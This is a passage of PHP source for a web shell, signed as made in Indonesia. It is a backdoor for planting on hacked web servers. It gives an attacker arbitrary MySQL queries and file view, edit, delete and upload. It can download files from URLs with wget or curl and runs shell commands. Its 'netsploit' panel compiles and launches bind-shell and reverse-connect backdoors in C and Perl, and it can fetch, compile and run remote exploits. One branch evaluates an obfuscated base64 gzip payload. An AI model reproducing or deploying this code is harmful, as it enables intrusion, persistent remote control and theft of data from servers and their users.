  3203. foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
  3204. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
  3205. $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
  3206. $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
  3207. if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  3208. for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
  3209. if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
  3210. if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  3211. $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
  3212. <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  3213. <input type="hidden" name="x" value="mysql" />
  3214. <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
  3215. <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
  3216. <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
  3217. <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
  3218. <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
  3219. <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
  3220. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a 
href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> ";
  3221. if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
  3222. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
  3223. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  3224. <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
  3225. <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  3226. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
  3227. $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
  3228. <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  3229. <table class="tabnet" style="width:320px;padding:0 1px;">
  3230. <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
  3231. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  3232. <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  3233. <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
  3234. <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
  3235. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3236. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." 
..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
  3237. <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
  3238. <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td>
  3239. <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td>
  3240. <td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
  3241. <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use">
  3242. <option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td>
  3243. <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td>
  3244. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
  3245. <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr>
  3246. <tr><td><select size="1" class="inputz" name="pilihan">
  3247. <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2">
  3248. <input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table>
  3249. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  3250. <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
  3251. <center><div class="info">IKI NGONO SHELL MADE IN INDONESIA <span class="gaya"><a href="http://fb.com/idbte4m"></a></span></div>